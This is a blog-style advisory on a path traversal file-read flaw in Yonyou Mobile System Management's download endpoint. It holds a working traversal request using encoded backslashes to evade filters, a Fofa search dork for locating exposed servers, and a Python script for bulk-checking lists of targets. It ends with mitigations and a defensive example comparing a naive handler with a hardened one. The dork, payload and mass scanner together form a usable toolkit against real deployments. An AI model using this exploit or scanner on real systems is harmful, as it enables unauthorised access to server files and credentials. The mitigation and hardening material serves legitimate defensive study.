Fading Coder

One Final Commit for the Last Sprint


Yonyou Mobile System Management Arbitrary File Read Vulnerability with Batch Verification PoC


The DownloadServlet endpoint in Yonyou Mobile System Management contains an arbitrary file read vulnerability. An attacker can craft a specially formatted HTTP request to retrieve arbitrary files readable by the application's service account, including sensitive configuration files and system data.

Affected Endpoint

/mobsm/common/download

Proof of Concept (PoC)

GET /mobsm/common/download?path=..%5cwebapps%5cnc_web%5cWEB-INF%5cweb.xml HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Connection: close

Note: The path traversal uses URL-encoded backslashes (%5c) as the directory separator. On Windows-based deployments the Java file API treats a backslash exactly like a forward slash, so the sequence still walks up out of the download directory while evading basic input filters that only look for the forward-slash form ../.

Fofa Dork for Target Discovery

app="用友-移动系统管理" || (title="Login" && body="移动系统管理") || body="../js/jslib/jquery.blockUI.js"

Batch Validation Script (Python)

Below is a lightweight script to validate the vulnerability against a single target or a file of targets:

import sys

import requests
import urllib3

# The PoC deliberately ignores certificate errors; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Traversal payload from the PoC above (backslashes URL-encoded as %5c).
PAYLOAD = "/mobsm/common/download?path=..%5cwebapps%5cnc_web%5cWEB-INF%5cweb.xml"


def check_vuln(target):
    """Return True if the target serves web.xml back through the download endpoint."""
    url = target.rstrip('/') + PAYLOAD
    try:
        resp = requests.get(url, timeout=8, verify=False)
        # A real web.xml root element carries attributes (<web-app xmlns=...>),
        # so match the opening tag without the closing '>' to avoid false negatives.
        if resp.status_code == 200 and '<web-app' in resp.text:
            print(f"[+] Vulnerable: {target}")
            return True
        print(f"[-] Not vulnerable: {target}")
        return False
    except requests.RequestException as e:
        print(f"[!] Error accessing {target}: {e}")
        return False


def load_targets(path):
    """Read one target URL per line, skipping blank lines and # comments."""
    with open(path, encoding='utf-8') as f:
        return [line.strip() for line in f if line.strip() and not line.startswith('#')]


if __name__ == "__main__":
    if len(sys.argv) == 2:
        targets = [sys.argv[1]]
    elif len(sys.argv) == 3 and sys.argv[1] == '-f':
        targets = load_targets(sys.argv[2])
    else:
        print("Usage: python3 yonyou_poc.py <target_url>")
        print("       python3 yonyou_poc.py -f <targets.txt>")
        sys.exit(1)
    for target in targets:
        check_vuln(target)

The script reports a target as vulnerable only when the response is a 200 whose body contains the opening <web-app tag, so a login page or error page returned with status 200 is not counted as a hit. Pass one URL for a single check, or -f with a file of URLs (one per line) for bulk validation. Deployments whose webapp directory is not named nc_web will yield a false negative with this fixed payload.

Mitigation

  • Decode, canonicalize and validate the path parameter server-side before any file access, treating backslashes and encoded separators the same as forward slashes.
  • Restrict file access to a predefined safe directory and an allowlist of permitted file types; reject any resolved path that escapes the base directory.
  • Upgrade to the latest patched version provided by Yonyou.
  • Deploy a Web Application Firewall (WAF) with rules that block path traversal patterns, including the encoded and backslash variants; treat this as defense in depth, not as the fix.
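The following is an added example and not code from this page or from Yonyou. It models, in Python, a naive download handler beside a hardened one, to show both why the %5c payload from the note above slips past a filter that only looks for ../, and how the canonicalization and allowlist mitigations listed here close that gap. The base directory, the allowlisted file suffixes and the function names are assumptions for illustration; the real DownloadServlet is Java and its directory layout is not known from the page.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical download root; the real servlet's base directory is not known from the page.
BASE_DIR = "/opt/yonyou/mobsm/files"

# The traversal value from the PoC above, with backslashes encoded as %5c.
PAYLOAD = "..%5cwebapps%5cnc_web%5cWEB-INF%5cweb.xml"


def resolve_unsafe(path_param):
    """Naive handler: decodes once and rejects only the literal '../' form.

    On a Windows host the backslash form still walks up one directory, so the
    %5c payload passes this filter untouched. Double-encoded input also passes,
    because it is decoded only once before the check.
    """
    decoded = unquote(path_param)
    if "../" in decoded:
        raise ValueError("path traversal rejected")
    return BASE_DIR + "/" + decoded


def resolve_safe(path_param, allowed_suffixes=(".pdf", ".xlsx", ".zip")):
    """Hardened handler: canonicalize first, then confine to BASE_DIR.

    Decode twice (defeats double encoding), treat '\\' as '/', reject NUL bytes
    and absolute paths, collapse '.' and '..' segments, then refuse any result
    that escapes the base directory or is not an allowlisted file type.
    A production handler should additionally os.path.realpath() the opened file
    to defeat symlinks; that step is left out so the example runs without a
    filesystem (assumption: string-level checks are sufficient for the demo).
    """
    decoded = unquote(unquote(path_param))
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        raise ValueError("absolute path rejected")
    normalized = posixpath.normpath(decoded)
    if normalized in (".", "..") or normalized.startswith("../"):
        raise ValueError("path escapes base directory")
    if not normalized.lower().endswith(allowed_suffixes):
        raise ValueError("file type not allowlisted")
    full = posixpath.join(BASE_DIR, normalized)
    # Belt and braces: the joined path must still sit strictly under BASE_DIR.
    if not full.startswith(BASE_DIR + "/"):
        raise ValueError("path escapes base directory")
    return full


def rejects(resolver, path_param):
    """True if the resolver refuses the value with ValueError."""
    try:
        resolver(path_param)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("naive filter, PoC payload     ->", resolve_unsafe(PAYLOAD))
    print("naive filter, ../etc/passwd   ->", "rejected" if rejects(resolve_unsafe, "../etc/passwd") else "allowed")
    print("hardened,     PoC payload     ->", "rejected" if rejects(resolve_safe, PAYLOAD) else "allowed")
    print("hardened,     reports%2Fq1.pdf ->", resolve_safe("reports%2Fq1.pdf"))
```

The naive handler returns a path that, on Windows, resolves one level above the download root even though its "../" check passed; the hardened handler rejects the same value, as well as the double-encoded and absolute-path variants, while still serving an ordinary allowlisted file under the base directory.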
